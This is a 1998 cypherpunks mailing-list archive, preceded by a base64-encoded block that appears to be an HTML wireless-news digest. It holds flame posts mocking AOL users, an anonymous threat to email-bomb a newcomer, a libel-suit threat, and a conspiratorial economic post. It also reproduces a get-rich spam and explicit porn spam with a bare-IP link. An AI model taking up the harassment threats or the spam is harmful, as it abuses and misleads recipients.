OwpJdCBhbHNvIGRvbmF0ZWQgJDc1LDAwMCB0byBhaWQgZW1lcmdlbmN5IHJl
bGllZiBlZmZvcnRzIGluIHRoZSBmbG9vZCByYXZhZ2VkClNvdXRoIFRleGFz
IGNvbW11bml0aWVzIG9mIExhcmVkbywgRWFnbGUgUGFzcywgVXZhbGRlLCBE
ZWwgUmlvIGFuZCBSaW8KQnJhdm8uICg8QSBIUkVGPSJodHRwOi8vbG10b25s
aW5lLmNvbS9uZXdzL3M2Lmh0bSI+TEFSRURPIE1PUk5JTkcgVElNRVM8L0E+
KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1RE
PgoKPFREPjxCUj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48
L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZP
TlQgU0laRT0rMT5DaGFyZ2UgV2lyZWxlc3MgUGhvbmUKQmF0dGVyaWVzIGJl
Zm9yZSBIdXJyaWNhbmU8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwv
VEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFy
aWFsLEhlbHZldGljYSI+RHVyaW5nIGh1cnJpY2FuZSBzZWFzb24sIHdpcmVs
ZXNzIHBob25lCnVzZXJzIGluIHRoZSBzb3V0aGVhc3Rlcm4gVW5pdGVkIFN0
YXRlcyBhcmUgYmVpbmcgYWR2aXNlZCB0byBrZWVwIHRoZWlyCnBob25lcyBj
aGFyZ2VkIHVwIGluIHRoZSBldmVudCBvZiBlbWVyZ2VuY2llcy4gVXNlcnMg
YXJlIGJlaW5nIGFza2VkIHRvCmtlZXAgZW1lcmdlbmN5IG51bWJlcnMgaGFu
ZHkgYW5kIHJlZnJhaW4gZnJvbSB1c2luZyB0aGVpciBwaG9uZXMgZHVyaW5n
CnNldmVyZSB3ZWF0aGVyIHVubGVzcyB0aGVyZSBpcyBhbiBlbWVyZ2VuY3kg
KDxBIEhSRUY9Imh0dHA6Ly93d3cuYmVhdWZvcnRnYXpldHRlLmNvbS9sb2Nh
bG5ld3Mvc3RvcnkvMCwxNDU4LDM4NDMxLDAwLmh0bWwiPkJFQVVGT1JUCkdB
WkVUVEU8L0E+KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+
CjxURD48L1REPgoKPFREPjxCUj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8
VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZl
dGljYSI+PEZPTlQgU0laRT0rMT5QYXlwaG9uZXMgR28gSGlnaC1UZWNoCmlu
IE9yZGVyIHRvIENvbXBldGUgd2l0aCBDZWxsdWxhcjwvRk9OVD48L0ZPTlQ+
PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8
VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5CeSAyMDA0LCBtb3Jl
IHRoYW4gb25lLXRoaXJkIG9mIHRoZSBwZW9wbGUKaW4gdGhlIFVuaXRlZCBT
dGF0ZXMgd2lsbCBiZSBjYXJyeWluZyBhIHBob25lLiBBY2NvcmRpbmcgdG8g
RnJvc3QgYW5kIFN1bGxpdmFuLAp0aGUgbmV4dCBmaXZlIHllYXJzIGFyZSBw
aXZvdGFsIHRvIHRoZSBwYXlwaG9uZSBpbmR1c3RyeSBhcyBhIHBlcmlvZCBv
Zgp0cmFuc2l0aW9uLiBBIHNoYWtlLW91dCBpcyBoYXBwZW5pbmcgaW4gdGhl
IGNvbXBldGl0aXZlIHN0cnVjdHVyZSBhbmQgaW5kdXN0cnkKY29uc29saWRh
dGlvbiBpcyBpbmV2aXRhYmxlLiAoPEEgSFJFRj0iaHR0cDovL2Jpei55YWhv
by5jb20vcHJuZXdzLzk4MDgzMS9jYV9mX3NfcGF5XzEuaHRtbCI+WUFIT088
L0E+KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48
L1REPgoKPFREPjxCUj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxU
RD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+
PEZPTlQgU0laRT0rMT5Ob3ZhdGVsIFdpcmVsZXNzIFNoaXBzClNhZ2UgV2ly
ZWxlc3MgSVAgTW9kZW08L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwv
VEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFy
aWFsLEhlbHZldGljYSI+VGhlIGV4dGVybmFsIG1vZGVtIHByb3ZpZGVzIHR3
by13YXkgd2lyZWxlc3MKY29tbXVuaWNhdGlvbiBmb3IgZGVza3RvcHMsIGxh
cHRvcHMgYW5kIGhhbmRoZWxkIFBDcy4gKDxBIEhSRUY9Imh0dHA6Ly9iaXou
eWFob28uY29tL2J3Lzk4MDgzMS9ub3ZhdGVsX3dpXzEuaHRtbCI+WUFIT088
L0E+KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48
L1REPgoKPFREPjxCUj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxU
RD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+
PEZPTlQgU0laRT0rMT5HbG9iZWNvbW0gU3lzdGVtcyBJbnRyb2R1Y2VzCmEg
TmV3IFBvcnRhYmxlIFNhdGVsbGl0ZSBQaG9uZTwvRk9OVD48L0ZPTlQ+PC9C
PjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+
PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5UaGUgRXhwbG9yZXIgSUkg
UG9ydGFibGUgU2F0cGhvbmUgaXMgYQpzbWFsbCwgbGlnaHR3ZWlnaHQgcG9y
dGFibGUgc2F0ZWxsaXRlIHRlbGVwaG9uZSBzeXN0ZW0gd2l0aCBJU0ROIHNl
cnZpY2UKY2FwYWJpbGl0eS4mbmJzcDsgSXQgaXMgc2NoZWR1bGVkIGZvciBk
ZWxpdmVyeSBpbiBTZXB0ZW1iZXIuICg8QSBIUkVGPSJodHRwOi8vYml6Lnlh
aG9vLmNvbS9wcm5ld3MvOTgwODI3L2lsX2dsb2JlY29fMS5odG1sIj5ZQUhP
TzwvQT4pPC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFRE
PjwvVEQ+Cgo8VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4K
PFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNh
Ij48Rk9OVCBTSVpFPSsxPlBhZ2luZyBDb21wYW55IHRvIFNlbGwKQWVyaWFs
J3MgUENTIFNlcnZpY2U8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwv
VEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFy
aWFsLEhlbHZldGljYSI+VFNSIFdpcmVsZXNzIExMQyBoYXMgZW50ZXJlZCBp
bnRvIGFuIGFncmVlbWVudAp3aXRoIEFlcmlhbCBDb21tdW5pY2F0aW9ucywg
SW5jLiB0byBzZWxsIEFlcmlhbCdzIFBlcnNvbmFsIENvbW11bmljYXRpb25z
ClNlcnZpY2UgYW5kIHByb2R1Y3RzIGluIHNldmVyYWwgQWVyaWFsIG1hcmtl
dHMuIEluaXRpYWxseSwgVFNSIFdpcmVsZXNzCndpbGwgcmVwcmVzZW50IEFl
cmlhbCBpbiB0aGUgTWlubmVhcG9saXMsIFBpdHRzYnVyZ2gsIFRhbXBhIGFu
ZCBPcmxhbmRvCm1hcmtldHMuICg8QSBIUkVGPSJodHRwOi8vYml6LnlhaG9v
LmNvbS9wcm5ld3MvOTgwODMxL2lsX2FlcmlhbF9fMS5odG1sIj5ZQUhPTzwv
QT4pPC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwv
VEQ+Cgo8VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFRE
PjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48
Rk9OVCBTSVpFPSsxPk5ldyBNb3Rvcm9sYSBDaGlwIERlbGl2ZXJzClBhZ2lu
ZyBDYXBhYmlsaXR5Jm5ic3A7PEJSPgpmb3IgUGVyc29uYWwgRGlnaXRhbCBB
c3Npc3RhbnRzPC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8
L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxI
ZWx2ZXRpY2EiPlRoZSBuZXcgY2hpcCAtLSB0aGUgTU1DMjA4MCAtLSBpcyBk
ZXNpZ25lZAp0byBkZWxpdmVyIGRhdGEgbWVzc2FnaW5nIGNhcGFiaWxpdHkg
Zm9yIFBEQXMsIGhpZ2gtdGllciBhbHBoYS1udW1lcmljCnBhZ2VycywgYW5k
IG90aGVyIHN5c3RlbXMgaW5jbHVkaW5nIHZlbmRpbmcgbWFjaGluZXMsIGFs
YXJtIHN5c3RlbXMgYW5kCnJlbW90ZSB1dGlsaXR5IG1ldGVyIHJlYWRpbmcu
ICg8QSBIUkVGPSJodHRwOi8vYml6LnlhaG9vLmNvbS9wcm5ld3MvOTgwODMx
L3R4X21vdG9yb2xfMS5odG1sIj5ZQUhPTzwvQT4pPC9GT05UPjwvVEQ+Cgo8
VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEJSPjwvVEQ+
Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZP
TlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPlUgUyBX
RVNULCBVbmlvbiBTZXR0bGUKUGhvbmUgU3RyaWtlPC9GT05UPjwvRk9OVD48
L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxU
RD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPk1lbWJlcnMgb2YgdGhl
IENvbW11bmljYXRpb25zIFdvcmtlcnMKb2YgQW1lcmljYSBlbmRlZCB0aGVp
ciAxNS1kYXkgc3RyaWtlIGFuZCBiZWdhbiByZXR1cm5pbmcgdG8gd29yayBh
dCBVIFMKV0VTVCB0b2RheSBhZnRlciByZWFjaGluZyBhIHRlbnRhdGl2ZSBh
Z3JlZW1lbnQgb24gYSBuZXcgdGhyZWUteWVhciBjb250cmFjdC4mbmJzcDsK
KDxBIEhSRUY9Imh0dHA6Ly93d3cud2FzaGluZ3RvbnBvc3QuY29tL3dwLXNy
di93YXNodGVjaC9sb25ndGVybS91c3dlc3Rfc3RyaWtlL3Vzd2VzdC5odG0i
PldBU0hJTkdUT04KUE9TVDwvQT4pIC0gKDxBIEhSRUY9Imh0dHA6Ly93d3cu
Y25uZm4uY29tL2hvdHN0b3JpZXMvY29tcGFuaWVzLzk4MDgvMzEvdXN3ZXN0
LyI+Q05OPC9BPikKLSAoPEEgSFJFRj0iaHR0cDovL2RhaWx5bmV3cy55YWhv
by5jb20vaGVhZGxpbmVzL3RjL3N0b3J5Lmh0bWw/cz12L25tLzE5OTgwODMx
L3RjL3Vzd2VzdF83Lmh0bWwiPllBSE9PPC9BPik8L0ZPTlQ+PC9URD4KCjxU
RD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48QlI+PC9URD4K
CjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9O
VCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+U05FVCBX
YWxrb3V0IEVudGVycyBTZWNvbmQKV2VlazwvRk9OVD48L0ZPTlQ+PC9CPjwv
VEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZP
TlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5ObyBuZXcgdGFsa3Mgc2NoZWR1
bGVkIGJldHdlZW4gU291dGhlcm4KTmV3IEVuZ2xhbmQgVGVsZWNvbW11bmlj
YXRpb25zIGFuZCB0aGUgQ29tbXVuaWNhdGlvbnMgV29ya2VycyBvZiBBbWVy
aWNhLgooPEEgSFJFRj0iaHR0cDovL3d3dy5ib3N0b24uY29tL2RhaWx5bmV3
cy93aXJlaHRtbC8yNDMvV2Fsa291dF9pbl9zZWNvbmRfd2Vla19fbm9fdGFs
a3Nfc2Uuc2h0bWwiPkJPU1RPTgpHTE9CRTwvQT4pPC9GT05UPjwvVEQ+Cgo8
VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+CjxIUiBXSURU
SD0iMTAwJSI+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9U
RD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJ
WkU9LTE+Rm9yIGFkZGl0aW9uYWwgbmV3cyBhYm91dAp0aGUgd2lyZWxlc3Mg
aW5kdXN0cnktLWluY2x1ZGluZyBwZXJpb2RpYyBuZXdzIHVwZGF0ZXMgdGhy
b3VnaG91dCB0aGUgZGF5LS12aXNpdAo8QSBIUkVGPSJodHRwOi8vd3d3Lndv
dy1jb20uY29tIj5odHRwOi8vd3d3Lndvdy1jb20uY29tLjwvQT48L0ZPTlQ+
PC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+
Cgo8VEQ+CjxIUiBXSURUSD0iMTAwJSI+PC9URD4KCjxURD48L1REPgo8L1RS
PgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2
ZXRpY2EiPjxGT05UIFNJWkU9LTE+Q1RJQSBEYWlseSBOZXdzIGZyb20gV09X
LUNPTQppcyB0cmFuc21pdHRlZCB3ZWVrZGF5cywgZXhjZXB0IGZvciBob2xp
ZGF5cy4gVmlzaXQgdXMgb24gdGhlIFdvcmxkIFdpZGUKV2ViIGF0IDxBIEhS
RUY9Imh0dHA6Ly93d3cud293LWNvbS5jb20vcHJvZmVzc2lvbmFsIj5odHRw
Oi8vd3d3Lndvdy1jb20uY29tL3Byb2Zlc3Npb25hbDwvQT4uJm5ic3A7PC9G
T05UPjwvRk9OVD4mbmJzcDsKCjxQPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZl
dGljYSI+PEZPTlQgU0laRT0tMT5JZiB5b3UgYXJlIG5vdCBpbnRlcmVzdGVk
CmluIHJlY2VpdmluZyB0aGUgQ1RJQSBEYWlseSBOZXdzIGZyb20gV09XLUNP
TSwgcGxlYXNlIHNlbmQgYSBtZXNzYWdlIHRvCjxBIEhSRUY9Im1haWx0bzp1
bmpvaW4tQ1RJQV9EYWlseV9OZXdzQHVtMi51bml0eW1haWwuY29tIj51bmpv
aW4tQ1RJQV9EYWlseV9OZXdzQHVtMi51bml0eW1haWwuY29tPC9BPi4mbmJz
cDs8L0ZPTlQ+PC9GT05UPiZuYnNwOwoKPFA+PEI+KioqPEZPTlQgRkFDRT0i
QXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPS0xPiBUaGUgdGVybSAidW5q
b2luLUNUSUFfRGFpbHlfTmV3c0B1bTIudW5pdHltYWlsLmNvbSIKbXVzdCBi
ZSBsaXN0ZWQgaW4gdGhlIFRPIHNlY3Rpb24gb2YgdGhlIGVtYWlsLjwvRk9O
VD48L0ZPTlQ+ICoqKjwvQj4mbmJzcDsKCjxQPjxGT05UIEZBQ0U9IkFyaWFs
LEhlbHZldGljYSI+PEZPTlQgU0laRT0tMT5QbGVhc2UgTm90ZTogU29tZSBv
ZiB0aGUKbGlua3MgaW4gdG9kYXkncyBuZXdzIGFyZSB0aW1lIHNlbnNpdGl2
ZS4mbmJzcDsgVGhvc2UgbGlua3MgbWF5IG5vdCBiZQphdmFpbGFibGUgYXMg
bmV3cyBjaGFuZ2VzIHRocm91Z2hvdXQgdGhlIGRheS4mbmJzcDsgQWxzbywg
c29tZSBuZXdzIHNvdXJjZXMKbWF5IGJlIHN1YnNjcmlwdGlvbi1iYXNlZCBv
ciByZXF1aXJlIHJlZ2lzdHJhdGlvbi48L0ZPTlQ+PC9GT05UPjwvVEQ+Cgo8
VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+CjxIUiBXSURU
SD0iMTAwJSI+PC9URD4KCjxURD48L1REPgo8L1RSPgo8L1RBQkxFPgombmJz
cDs8L2NlbnRlcj4KPC9CT0RZPgo8L0hUTUw+Cg==
--Boundary..3995.1071713796.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jkthomson <jkthomson@bigfoot.com>
Date: Mon, 31 Aug 1998 14:41:53 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re:
In-Reply-To: <67d557e1.35eb0495@aol.com>
Message-ID: <3.0.3.32.19980831144238.006f80d0@dowco.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:16 PM 8/31/98 EDT, ILovToHack@aol.com wrote:
>Ibelive by spooks he ment goverment agents not a racial slur so lay off.

trust me, it's ok, he was using '32-bit AOL' to post his message, so
EVERYONE but you realized that he was talking about garbage anyway.  maybe
AOL64 will have a clue(tm) built in.


an appeal to listmembers:

listmembers, can't we make this list 'request for access'?  iLoV2HaCk and
his AOL ilk are getting a little too 'elite' and 'k-rad' for me. pipebombs,
posters, spooks, music, what the hell is happening to this list?  I know
that I mainly lurk, but don't you think that having to request to join this
list may filter out the worst of the AOL (et al) newbies?  they obviously
cannot get a clue(tm) and continue to cause a landslide of off-topic
(albeit funny) posts that ridicule them, and keep this list awash in
non-cypherpunkish dialogue.  

oh, and I am also sorry for perpetuating this thread.


  

-----------------------------------------------------------------------
 james 'keith' thomson <jkthomson@bigfoot.com>  www.bigfoot.com/~ceildh
 jkthomson:C181 991A 405C EAFB 2C46 79B5 B1DC DB78 8196 122D [06.07.98]
 ceildh   :1D79 59AF ED75 5945 6003 8240 DA34 ACCA 9DE4 6BC9 [05.14.98]
 ICQ:746241 <keys> at pgp.mit.edu     ...and former sysop of tnbnog BBS
-----------------------------------------------------------------------
The people to worry about are not those who openly disagree with you,
but those who disagree with you who are too cowardly to let you know.
=======================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ILovToHack@aol.com
Date: Mon, 31 Aug 1998 13:17:58 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re:
Message-ID: <67d557e1.35eb0495@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Ibelive by spooks he ment goverment agents not a racial slur so lay off.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "R. Paul McCarty" <mccarty@reg16.admin.rochester.edu>
Date: Mon, 31 Aug 1998 13:43:29 -0700 (PDT)
To: Anonymous <nobody@replay.com>
Subject: Re: your mail
In-Reply-To: <199808311641.SAA29684@replay.com>
Message-ID: <Pine.LNX.3.96.980831163625.17696A-100000@reg16.admin.rochester.edu>
MIME-Version: 1.0
Content-Type: text/plain


I think you're a little wet behind the ears dear.  In the context of this
group, "spook" has nothing to do with derogatory racial slurs.  Pick up a
hackers dictionary and get with it.

Cheers.

-Paul

R. Paul McCarty / DARS Coordinator / rpmc@troi.cc.rochester.edu / x52059
317 Lattimore Hall, University of Rochester, Rochester, NY 14627
Computers don't make errors; what they do, they do on purpose.-Dale/KOTH



On Mon, 31 Aug 1998, Anonymous wrote:

> We don't take kindly to racial slurs here.  You'll probably be receiving
> hundreds of email bombs over the next few days from angry
> cypherpunks.  You may want to change email accounts.
> 
> God bless!
> 
> 
> At 08:19 PM 8/29/98 -0400, RyanFord@aol.com wrote:
> > hola and good tidings 
> >  send some info on spooks please 
> >  i will be grateful
> > 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: FTPPork@aol.com
Date: Mon, 31 Aug 1998 15:23:36 -0700 (PDT)
To: cypherpunks@toad.com
Subject: DES Ecryption
Message-ID: <5bdef0da.35eb223f@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Hey, could anyone tell me what process DES Encryption goes through, or point
me to a site with the information?

Thanx
-Buzz-
P.S. Please no flames because I am on AOL...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fed@icc.ru
Date: Mon, 31 Aug 1998 17:32:01 -0700 (PDT)
To: Friend@public.com
Subject: If you'd like......
Message-ID: <199809010025.IAA03245@mail.rat.com.tw>
MIME-Version: 1.0
Content-Type: text/plain


To Make Unlimited Income.  If that's what you want.  Learn How:

No meetings, No Phone Calls, No Conf. Calls, No Selling, No Monthly 
Quotas or chasing around friends and relatives.
Simply advertise our company's 800# under your personal code number.   
For Proof, call 24 Hrs./Day....Recorded Messages...1-888-446-6951,
1-888-703-5389, 1-888-731-3457 or 1-888-715-0642.
Want paperwork in your hands FOD: 415-273-6020 (7 pg.)

To get started right away, Call 1-800-811-2141 code 58420
(from 8am to 10pm..CST..Mon-Sat.) 
Ask about a free Vacation when you call.
Work smarter, not harder.



This message complies with the United States Federal requirements for
commercial email as well as the Washington State Commercial Email Bill. 
For additional information see:
http://www.senate.gov/~murkowski/commercialemail/EMailAmendText.html 
Washington State Commercial Email Bill:
http://ww.wa.gov/wwweb/AGO/junkemail/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Mon, 31 Aug 1998 09:41:48 -0700 (PDT)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199808311641.SAA29684@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


We don't take kindly to racial slurs here.  You'll probably be receiving
hundreds of email bombs over the next few days from angry
cypherpunks.  You may want to change email accounts.

God bless!


At 08:19 PM 8/29/98 -0400, RyanFord@aol.com wrote:
> hola and good tidings 
>  send some info on spooks please 
>  i will be grateful
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Mon, 31 Aug 1998 18:09:38 -0700 (PDT)
To: j orlin grabbe <senator@wyden.senate.gov
Subject: Economic opinion
Message-ID: <35EB4824.227F@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Monday 8/31/98 6:31 PM

J Orlin Grabbe 
http://www.aci.net/kalliste
http://www.aci.net/kalliste/apocalyp.htm

Patty 

    Implementing Basics : How Basics Work 
    William H. and Patricia Payne / Published 1982
    http://www.amazon.com

and I just watched in Lehrer news hour.

One question repeatedly came up which you might care to write about.

Is capitalism a proper economic model for Russia and China?

Or merely a DELIBERATE attempt to screw-up both counties' economies	
by US 'intelligence' agencies?  And other countries' economies as well?

http://www.stratfor.com/services/gintel/redalert/

Your observations and ECONOMIC opinions might be valuable to all of us.

Later 

http://www.apcatalog.com/cgi-bin/AP?ISBN=0125475705&LOCATION=US&FORM=FORM2
http://jya.com/f86/whpf86.htm

http://www.aci.net/kalliste/speccoll.htm   
http://caq.com/cryptogate  
http://jya.com/whpfiles.htm  
http://www.qainfo.se/~lb/crypto_ag.htmBest   


bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jkthomson <jkthomson@bigfoot.com>
Date: Mon, 31 Aug 1998 20:18:31 -0700 (PDT)
To: ILovToHack@aol.com
Subject: Re:
In-Reply-To: <3a06d336.35eb1f5d@aol.com>
Message-ID: <3.0.3.32.19980831201915.006fc410@dowco.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1



ok, sorry to have to drag the list into this AGAIN, but this AOL'er 
is much too funny for his own good.  Imagine, he is entertaining me 
(perhaps the list?) for free!


>At 04:16 PM 8/31/98 EDT, ILovToHack@aol.com wrote:
>>Ibelive by spooks he ment goverment agents not a racial slur so lay 
off.

>trust me, it's ok, he was using '32-bit AOL' to post his message, so 
EVERYONE >but you realized that he was talking about garbage anyway.  
maybe AOL64 will >have a clue(tm) built in.


>an appeal to listmembers:

>listmembers, can't we make this list 'request for access'?  
iLoV2HaCk and his >AOL ilk are getting a little too 'elite' and 'k-
rad' for me. pipebombs, >posters, spooks, music, what the hell is 
happening to this list?  I know that >I mainly lurk, but don't you 
think that having to request to join this list >may filter out the 
worst of the AOL (et al) newbies?  they obviously cannot >get a 
clue(tm) and continue to cause a landslide of off-topic (albeit 
funny) >posts that ridicule them, and keep this list awash in non-
cypherpunkish >dialogue.  

>oh, and I am also sorry for perpetuating this thread.


...and I got some AOL mail back from him!  wooho!


At 06:10 PM 8/31/98 EDT, you wrote:
>You post a message like that again and you will be sued for libel my 
screen
>name is just a nic and by the way if you think i am jokeing about 
the law suit
>try me
>
><Mike Haisley>
><ceo comnerd inc.>
><ILovToHack@aol.com>

dude...  please.  take your best shot.  I'm bored of you already and 
I want to see if you are actually as clueless as you appear to be.  
do it.  c'mon! I'll even SIGN this message, Mike!

oh yes, and apologies go out to the list, _again_.  




-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQA/AwUBNetnsrHc23iBlhItEQKiuwCbBS2gFXzDt4ZcpGsGsPimICJGeh4AnRyY
KWL0x6FZaT+mOxFhC3Jr1Zgu
=URJ7
-----END PGP SIGNATURE-----


-----------------------------------------------------------------------
 james 'keith' thomson <jkthomson@bigfoot.com>  www.bigfoot.com/~ceildh
 jkthomson:C181 991A 405C EAFB 2C46 79B5 B1DC DB78 8196 122D [06.07.98]
 ceildh   :1D79 59AF ED75 5945 6003 8240 DA34 ACCA 9DE4 6BC9 [05.14.98]
 ICQ:746241 <keys> at pgp.mit.edu     ...and former sysop of tnbnog BBS
-----------------------------------------------------------------------
The people to worry about are not those who openly disagree with you,
but those who disagree with you who are too cowardly to let you know.
=======================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: freemem@yahoo.com
Date: Mon, 31 Aug 1998 20:30:43 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Free Membership!!!!!!!!
Message-ID: <199809010330.UAA28504@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Hey cypherpunks....
You gotta check this out, I was really bored so i was surfing the net
and i stumbled upon this porn site, and let me tell you this is the best shit.
Its got everything !!!! And *FREE MEMBERSHIP*
Check it out   http://209.167.161.17
It even has a WHORE GUIDE for the entire country,
but that was only one of the cool things that it has.
its got;
LIVE VIDEO PORN
FUCK FLICKS
NUDE CELEBRITIES- this one is great
PHOTO GALLERY
You even get to see the pamelah lee vidoe**FREE**
Trust me  http://209.167.161.17

P.S.   Ill be over a little later with some Brewskies
see ya

************************************************************************
If You Would Like To Be Removed From Our Future Mailings,
Please Reply With The Subject Remove,
Or Manually Send To freemem@coolmail.to
And Your Email Will Be Entered In The Global Remove Filter.
************************************************************************







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Destroy micro$oft" <ihate_ms@hotmail.com>
Date: Mon, 31 Aug 1998 20:51:51 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: BEWARE of SnakeOil (tm)
Message-ID: <19980901035117.17954.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, Aug 31, 1998 at 10:43:23PM -0400, Jean-Francois Avon wrote:
|
| - beware of any product that has not been *extensively* peer-reviewed, 
with *all* the
| source code made public.  Security breaches are *very* easy to 
overlook and no software
| should *ever* be used unless it was peer-reviewed.


The source code for his Linux implementation is available at
http://www.filesafety.com/CRYPT.EXE - which is actually a tar+gzipped
file.

______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Mon, 31 Aug 1998 19:16:38 -0700 (PDT)
To: "Cypherpunks" <cypherpunks@toad.com>
Subject: Please help!  Snakeoil offers on the Canadian Firearms Digest mailing list...
Message-ID: <199809010219.WAA26139@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


Please Reply To: cdn-firearms-digest@broadway.sfn.saskatoon.sk.ca

As of today, I'm off the list.  It must be the Fickle Finger of Fate
that made that post appear on the CFD today!


It looks like snake oil, it taste like snakeoil, is smell like snakeoil;
Is *it* snakeoil?

======= forwarded by JFA, from Canadian Firearms Digest ==========

Date: Mon, 31 Aug 1998 15:30:34 -0600
From: Lee Scroggins <goobr2@ptd.net>
Subject: New/easy to use strong file encryption fyi

For anyone interested in easy to use strong file encryption, or just
afraid that your gun related data/Emails may be too tempting for the
officials, the following article points to an interesting site
(http://www.filesafety.com).

Please note that the US govt seems to be having a hissy fit about it
(you might want to look while it still exists).


>
> - - The Strange Case of Charles Booher - -
>
> The California man whose software drew the interest of the Commerce
Department
> now has been hit with a subpoena. Charles Booher must appear before a U.S.
> District Court grand jury in San Jose to explain what he is doing with his
> encryption software, SecureOffice.
>
> Individuals can be charged with violating federal restrictions on the
export
